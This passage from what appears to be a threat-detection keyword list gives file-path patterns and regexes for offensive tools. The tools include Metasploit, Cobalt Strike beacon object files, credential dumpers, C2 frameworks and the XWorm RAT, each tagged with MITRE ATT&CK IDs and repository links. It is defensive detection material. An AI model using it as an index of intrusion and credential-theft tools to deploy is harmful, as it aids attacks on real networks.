TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/vncdll/*",".{0,1000}\/vncdll\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/vncEncoder.*",".{0,1000}\/vncEncoder\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/VNCHooks*",".{0,1000}\/VNCHooks.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/VNCHooks.*",".{0,1000}\/VNCHooks\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/vnc-info.nse*",".{0,1000}\/vnc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnc-title.nse*",".{0,1000}\/vnc\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnik_v1.c*",".{0,1000}\/vnik_v1\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/voldemort-info.nse*",".{0,1000}\/voldemort\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Volumiser.exe*",".{0,1000}\/Volumiser\.exe.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*/Volumiser.git*",".{0,1000}\/Volumiser\.git.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*/Volumiser-maser.zip*",".{0,1000}\/Volumiser\-maser\.zip.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*/vpc__enum_lateral_movement*",".{0,1000}\/vpc__enum_lateral_movement.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/vss-enum.py*",".{0,1000}\/vss\-enum\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/vssenum/*",".{0,1000}\/vssenum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*/vtam-enum.nse*",".{0,1000}\/vtam\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vulners.nse*",".{0,1000}\/vulners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vulnscan.yaml*",".{0,1000}\/vulnscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/vulnserver.py*",".{0,1000}\/vulnserver\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*/vulscan.nse*",".{0,1000}\/vulscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/vuze-dht-info.nse*",".{0,1000}\/vuze\-dht\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/waf__enum/main.py*",".{0,1000}\/waf__enum\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/Wait_For_Command.ps1*",".{0,1000}\/Wait_For_Command\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/Waitfor-Persistence.git*",".{0,1000}\/Waitfor\-Persistence\.git.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*/Waitfor-Persistence.ps1*",".{0,1000}\/Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*/wapitiCore/*",".{0,1000}\/wapitiCore\/.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*/wapiti-scanner/*",".{0,1000}\/wapiti\-scanner\/.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/wce32.exe*",".{0,1000}\/wce32\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wce64.exe*",".{0,1000}\/wce64\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wce-beta.zip*",".{0,1000}\/wce\-beta\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wcreddump.git*",".{0,1000}\/wcreddump\.git.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*/wcreddump.py*",".{0,1000}\/wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*/wdb-version.nse*",".{0,1000}\/wdb\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/WDExclusion.dll*",".{0,1000}\/WDExclusion\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/wdextract.cpp*",".{0,1000}\/wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdextract.cpp*",".{0,1000}\/wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/WDExtract.git*",".{0,1000}\/WDExtract\.git.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdextract32.exe*",".{0,1000}\/wdextract32\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdextract64.exe*",".{0,1000}\/wdextract64\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdigest.py*",".{0,1000}\/wdigest\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/WdToggle.c*",".{0,1000}\/WdToggle\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*/WdToggle.h*",".{0,1000}\/WdToggle\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*/weakpass.git*",".{0,1000}\/weakpass\.git.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/weakpass_2a.gz*",".{0,1000}\/weakpass_2a\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/weakpass_3a.7z*",".{0,1000}\/weakpass_3a\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/Web/decouverte.txt*",".{0,1000}\/Web\/decouverte\.txt.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/Web/discovery.txt*",".{0,1000}\/Web\/discovery\.txt.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/web/pwn.html*",".{0,1000}\/web\/pwn\.html.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*/web_delivery.py*",".{0,1000}\/web_delivery\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/web_rce.py*",".{0,1000}\/web_rce\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/WebC2.cs*",".{0,1000}\/WebC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/webdav.py*",".{0,1000}\/webdav\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/WebDavC2.git*",".{0,1000}\/WebDavC2\.git.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*/webdavshare/potato.local*",".{0,1000}\/webdavshare\/potato\.local.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*/web-hacking-toolkit*",".{0,1000}\/web\-hacking\-toolkit.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","156","30","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "*/weblistener.py*",".{0,1000}\/weblistener\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" 